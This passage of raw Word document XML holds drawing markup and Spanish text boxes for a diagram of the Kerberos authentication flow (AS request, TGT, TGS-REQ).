                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="71198" y="42617"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74838" y="30448"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="62610" y="26797"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="2053589" h="2028189">
                                <a:moveTo>
                                  <a:pt x="75931" y="26797"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="62610" y="26797"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74838" y="30448"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="75931" y="2679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D17378" id="Group 507" o:spid="_x0000_s1026" style="position:absolute;margin-left:138.1pt;margin-top:1.45pt;width:683.8pt;height:512.9pt;z-index:-17893376;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="86842,6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">
                <v:shape id="Image 508" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:86837;height:6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">
                  <v:imagedata r:id="rId71" o:title=""/>
                </v:shape>
                <v:shape id="Image 509" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:28543;top:1913;width:35002;height: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">
                  <v:imagedata r:id="rId265" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 510" o:spid="_x0000_s1029" style="position:absolute;left:6433;top:12485;width:59182;height:50933;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5918200,50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" path="m636397,4626584r-78867,32131l581355,4679632r-68529,77369l473837,4800016r-38100,41376l398272,4880851r-36322,37033l326644,4952060r-34036,31090l260096,5010594r-45632,33490l214261,5044275r-368,203l213283,5044897r-13004,8204l160921,5072507r-23761,6604l136626,5079111r-10261,1117l118173,5080228r-9373,-1676l107835,5078387r-7836,-2756l99199,5075364r-7798,-4254l90970,5070767r-7658,-5829l82550,5064087r-6350,-6325l75488,5056771,52070,5015573,38150,4970462r-241,-813l34061,4952060r-3366,-18098l28346,4919650r-241,-1766l28003,4917554r-292,-1765l27787,4915586r-2756,-19965l20662,4853825r-3289,-45224l14998,4759020r-1917,-76924l12700,4628794r,-54369l13081,4519206r635,-55626l1016,4463440,,4574425r,54369l279,4658715r102,11380l1511,4733506r1765,49580l6032,4830280r3874,44297l15240,4917554r6604,38151l34925,5005603r17526,40196l84328,5081689r43053,11214l139573,5091582r12573,-2819l165100,5084496r10337,-4268l178155,5079111r43206,-24308l267970,5020526r33020,-27801l335280,4961331r35560,-34404l407416,4889690r37592,-39611l483235,4808601r38989,-43091l590905,4688014r23902,20968l624992,4670095r11405,-43511xem3194177,806069r-51,-2540l3194037,799211r-114,-5842l2779395,799211r-135509,4318l2510536,809879r-130556,8763l2252726,830453r-123190,15367l2010664,865251r-113792,23876l1842008,902970r-53340,15240l1736725,934720r-50165,18034l1638046,972312r-46736,21082l1546225,1016127r-43053,24511l1462151,1066927r-38989,28194l1386205,1125093r-34798,32004l1318895,1191133r-30226,36068l1260475,1265047r-26035,39624l1210310,1346200r-22098,43180l1167892,1434084r-18415,46228l1132713,1528064r-15113,49276l1104138,1627886r-12192,51943l1072134,1787271r-14758,111061l1046988,2014982r-6350,119380l1037717,2256790r,124841l1039863,2507869r3810,128270l1051090,2817495r76,1854l1019429,2820670r41148,74549l1089088,2831973r6541,-14478l1063866,2818828r-7468,-182308l1052449,2508377r-2032,-126746l1050417,2256790r2908,-121577l1059688,2015998r10160,-115304l1084580,1789442r19583,-105854l1116457,1631061r12827,-48375l1144143,1534058r17145,-49162l1179588,1439176r20054,-44208l1221346,1352473r23584,-40665l1270977,1272133r27471,-36893l1328127,1199857r293,-317l1328331,1199718r266,-267l1360170,1166368r33972,-31344l1430883,1105128r37351,-26962l1469047,1077683r127,-101l1469034,1077645r394,-228l1508379,1052410r1206,-660l1552219,1027430r44425,-22479l1642643,984097r48362,-19405l1740789,946785r52654,-16726l1845310,915289r52793,-13412l2011222,878090r1550,-241l2130996,858443r-127,l2251075,843432r129794,-12090l2511171,822579r133223,-6477l2779776,811911r137160,-2782l3194177,806069xem3440938,133731r-5144,-2159l3362325,100711r2057,30861l3364433,132435r-798017,59208l2355215,211963r-206248,23114l2047875,247777r-99314,13843l1850898,276225r-95758,15875l1661160,308864r-91694,18161l1479804,346329r-87249,20701l1307719,389128r-82169,23495l1145921,437896r-76581,26670l995553,493014r-70739,30353l857377,555371r-64262,34036l732409,625475r-57277,37973l621665,703707r-49784,42418l526034,790829r-41910,46863l445897,886841r-34671,51054l379984,990854r-27813,55118l327660,1102614r-21463,58547l287655,1221359r-15621,61722l259207,1346454r-10414,64897l241046,1477518r-5461,67437l232283,1613662r-1143,70104l232016,1753997r2629,71501l239077,1898777r5931,73660l261493,2123948r21209,153047l307975,2432177r28194,156972l366268,2747010r31242,158623l409956,2903093,378841,2744724,348742,2586863,320548,2430018,295275,2275078,274066,2122424,257924,1973580r-6020,-73914l247434,1826641r-2693,-72136l243840,1683766r1130,-69457l248119,1546174r5627,-67386l261251,1413802r10211,-63996l271653,1348943r38,-318l284365,1286141r15482,-61201l318135,1165377r21234,-57582l363601,1051496r27457,-54292l391147,997013r30835,-52451l456285,894181r37237,-47726l494017,845705r7239,-8013l535368,799541r45237,-44184l629450,713740r127,-127l682612,673747r56375,-37439l739584,635927r58026,-34494l799122,600633r63855,-33832l930021,534924r69799,-29934l1073327,476592r229,l1075778,475742r72848,-25388l1149794,449999r79439,-25184l1311021,401320r84582,-21971l1482598,358775r89281,-19304l1663446,321310r93726,-16764l1852803,288798r97536,-14605l2049526,260477r99961,-12700l2149348,247777r207137,-23114l2567559,204343r432943,-34417l3365284,145110r-623,-9259l3365233,144272r51,838l3367405,176784r73533,-43053xem5068659,40068r-305,-444l5066792,37338r-2718,-2667l5028819,14224r-5283,-1524l5015611,10414,4968240,2667,4909693,r-21844,l4841240,1524r-52540,3175l4789132,4699r-52286,4445l4650740,18161r-29972,3556l4496181,37846,4300855,65786r1778,12446l4560951,42164r91186,-11430l4737989,21717r53111,-4395l4841748,14224r46228,-1524l4909439,12700r20561,393l4949063,13970r18389,1435l4967097,15405r16980,1917l4983734,17322r13906,2185l4998847,19773r36614,10681l5044491,35153r355,178l5051476,40068r457,318l5051552,40068r17107,xem5074285,62357r-102,-6096l5073523,51562r-1092,-3937l5072227,46863r-101,-381l5071440,45085r-1600,-3302l5068875,40386r-16942,l5051806,40386r5473,5486l5059057,48488r1042,2058l5060188,50901r305,661l5060366,51562r711,2159l5061369,56261r101,6096l5061204,65405r-76,381l5060962,66294r-2298,9017l5038356,113233r-33794,43104l4975098,188849r-33528,34036l4905375,257810r-37846,35179l4829175,327914r-56134,50165l4755388,393954r-17145,15240l4706747,437896r-2540,2476l4681728,417830r-27051,80772l4735576,471805r-13437,-13462l4713173,449351r2210,-2184l4746752,418719r90932,-81407l4876038,302387r37973,-35306l4950460,232029r33782,-34417l5014087,164719r25146,-30861l5065522,92202r8128,-24130l5074285,62357xem5917819,3495675r-12700,-6350l5841619,3457575r,31750l1983994,3489325r,12700l5841619,3502025r,31750l5905119,3502025r12700,-6350xe" fillcolor="black" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 511" o:spid="_x0000_s1030" style="position:absolute;left:22519;top:27835;width:18663;height:18168;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1866264,181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" path="m1412367,81280r-6376,-20066l1386586,r-49530,69342l1365288,73825r-4229,26886l1352296,151638r-9132,48653l1331404,255638r-11252,47384l1320025,303415r-140,610l1305966,354609r-15456,49365l1273098,452005r13,153l1253083,500888r-23012,48475l1204226,597192r-76,266l1190117,621030r-14491,22898l1159154,668197r-127,242l1123670,716026r-37871,45161l1065161,783602r-76,191l1045908,803503r-2807,2756l1042974,806386r-22656,22289l996086,851039r-114,178l945464,894981r-31242,25248l861314,960755r-64161,46062l738124,1046480r-32512,21209l638429,1109853r-34544,20828l535787,1170851r-67500,38468l386588,1254506r-152400,81661l,1457579r8636,17018l243078,1352931r152654,-81661l470027,1230122r72898,-41402l613664,1147064r34671,-20955l682371,1105027r33528,-21209l748538,1062482r32131,-21463l812165,1019556r60452,-43434l929767,932180r53721,-44450l1033272,842645r45720,-45962l1120394,750189r37211,-47244l1191006,655193r29718,-48387l1247013,558038r23368,-49403l1290828,458851r18161,-50038l1324610,358521r13970,-50546l1350645,257048r10795,-50927l1370965,155067r8763,-51181l1384058,76796r28309,4484xem1866125,489204r-241,-31750l1864766,426161r-25,-838l1862874,393954r-38,-762l1860257,362077r-88,-1143l1857108,329946r-114,-1270l1844040,231521r-10541,-65024l1821815,101346,1809750,36195r-12446,2286l1809369,103632r11557,64897l1831467,233426r9017,64516l1844294,329946r3175,30988l1847596,362077r2476,31115l1850136,393954r1866,31369l1852041,426161r1130,31039l1853425,489204r-495,31115l1851431,551230r-2667,31471l1848827,582942r-3644,30595l1840560,643077r-6122,31724l1834438,675030r-15697,60046l1798193,792873r-13615,31230l1784464,824382r-30226,57569l1717167,938618r-22124,29274l1694700,968349r-23266,27648l1646542,1023239r-27280,27203l1619161,1050607r-58027,51892l1525778,1130808r-34113,25806l1454404,1183132r-38354,25908l1376299,1234567r-41402,25273l1291971,1284986r-39002,22085l1252804,1307160r-54318,29413l1149959,1361884r-42773,21781l1057910,1407795r-50292,24003l956310,1455674r-52324,23749l850646,1503045r-108839,46863l630047,1596390r-178855,71945l177520,1774825r-11404,-29591l108712,1808226r84836,8128l183896,1791335r-1791,-4611l463042,1677289r171831,-69088l746760,1561719r108966,-46990l961517,1467231r51435,-23876l1063371,1419225r49403,-24257l1161034,1370457r47117,-24638l1253871,1321054r19672,-11075l1298321,1296035r43053,-25273l1383030,1245362r40005,-25654l1461516,1193673r36957,-26289l1533525,1140841r33401,-26670l1578267,1104430r20155,-17310l1628013,1059688r27813,-27686l1705102,975614r41656,-57658l1781302,859282r27940,-59690l1830832,739013r16002,-61468l1857756,615315r6223,-62865l1865503,520827r622,-31623xe" fillcolor="#ec7c30" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 512" o:spid="_x0000_s1031" style="position:absolute;left:53416;top:20121;width:20536;height:20282;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2053589,202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" path="m74838,30448l71198,42617r205915,61522l551179,188849r133604,43307l815339,276225r126746,44958l1064513,367411r117475,47625l1238757,439293r55245,24638l1347724,489076r52215,25606l1450212,540512r50692,27794l1545731,594070r43895,26903l1632177,648838r41682,29088l1711340,706189r36216,29554l1782890,767014r31367,30865l1814496,798011r28908,31299l1870202,861568r24510,32639l1916251,926453r20145,33666l1955801,997042r15927,34719l1997756,1101901r19231,71578l2017606,1176195r82,196l2024574,1211607r6244,39857l2030856,1251708r102,652l2038153,1327785r1699,39369l2040379,1407033r-630,39496l2038002,1486022r-2700,40899l2031619,1567434r-4445,40894l2021839,1649349r-5841,41275l2009266,1732026r-6985,41529l1987093,1855474r-17196,85594l1952625,2025142r12446,2540l1982342,1943608r16891,-84074l2014727,1775714r7112,-41656l2028571,1692529r5841,-41402l2039747,1609852r4572,-41021l2047875,1527937r2794,-40513l2052447,1447038r634,-40005l2052581,1367774r-7,-620l2050972,1328967r-3008,-39155l2043429,1249807r-5944,-38200l2030095,1173479r-9144,-37465l2010155,1098803r-12573,-36576l1983104,1026160r-16382,-35687l1948306,955421r-20447,-34418l1905127,886968r-24893,-33274l1853056,821054r-29591,-32003l1791461,757682r-34416,-30607l1720341,697102r-38989,-29337l1640331,638937r-43179,-28194l1552066,583184r-47116,-27178l1456181,529336r-50546,-26036l1353311,477647r-53975,-25147l1243964,427609r-57023,-24258l1069212,355600,946530,309245,819530,264160,688848,220090,554989,176784,280797,91948,74838,30448xem1782890,767014r-138,l1784234,768331r-1344,-1317xem83947,l,14732,62102,73025,71198,42617,59054,38988,62610,26797r13321,l83947,xem62610,26797l59054,38988r12144,3629l74838,30448,62610,26797xem75931,26797r-13321,l74838,30448r1093,-3651xe" fillcolor="black" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FB6430" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C3F808C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B333F1E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28094DF2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0800140F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="187"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="060E4072" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:ind w:left="11126"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36BEB17D" wp14:editId="4CABCAB9">
                <wp:extent cx="2400300" cy="462280"/>
                <wp:effectExtent l="9525" t="0" r="0" b="13970"/>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462280"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="697D306B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="181" w:firstLine="218"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>2. DC descifra el mensaje y realiza una verificación si todo está bien</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="36BEB17D" id="Textbox 513" o:spid="_x0000_s1263" type="#_x0000_t202" style="width:189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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="697D306B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="181" w:firstLine="218"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>2. DC descifra el mensaje y realiza una verificación si todo está bien</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCB0358" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="224"/>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93312" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="758CEB87" wp14:editId="3A348F75">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>987552</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>319150</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2425065" cy="462280"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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065" cy="462280"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="51D254EA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="140" w:firstLine="28"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>1. El nombre de usuario de dominio con la hora actual se envía a DC de forma cifrada</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="758CEB87" id="Textbox 514" o:spid="_x0000_s1264" type="#_x0000_t202" style="position:absolute;margin-left:77.75pt;margin-top:25.15pt;width:190.95pt;height:36.4pt;z-index:-15623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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="51D254EA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="140" w:firstLine="28"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>1. El nombre de usuario de dominio con la hora actual se envía a DC de forma cifrada</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93824" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0D704743" wp14:editId="276A7AF5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3557015</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>704723</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="882650" cy="276225"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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276225"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="48D2D684" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="59"/>
                              <w:ind w:left="140"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>3. Tengo TGT</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="0D704743" id="Textbox 515" o:spid="_x0000_s1265" type="#_x0000_t202" style="position:absolute;margin-left:280.1pt;margin-top:55.5pt;width:69.5pt;height:21.75pt;z-index:-15622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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="48D2D684" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="59"/>
                        <w:ind w:left="140"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>3. Tengo TGT</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94336" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3AFBC386" wp14:editId="6788C032">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3835908</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1680082</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1530350" cy="646430"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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646430"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="EC7C30"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="5092DC77" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="211" w:firstLine="199"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve">5. TGT enc con hash </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>krbtgt</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve">, </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>solicitud</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="2D209FDE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="290" w:lineRule="exact"/>
                              <w:ind w:left="396"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>a TGS (TGS-REQ)</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="3AFBC386" id="Textbox 516" o:spid="_x0000_s1266" type="#_x0000_t202" style="position:absolute;margin-left:302.05pt;margin-top:132.3pt;width:120.5pt;height:50.9pt;z-index:-1562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" fillcolor="#ec7c30" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5092DC77" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="211" w:firstLine="199"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve">5. TGT enc con hash </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>krbtgt</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve">, </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>solicitud</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="2D209FDE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="290" w:lineRule="exact"/>
                        <w:ind w:left="396"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>a TGS (TGS-REQ)</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94848" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="04423A2D" wp14:editId="7BBE750F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7917180</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1291463</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2903220" cy="460375"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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460375"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
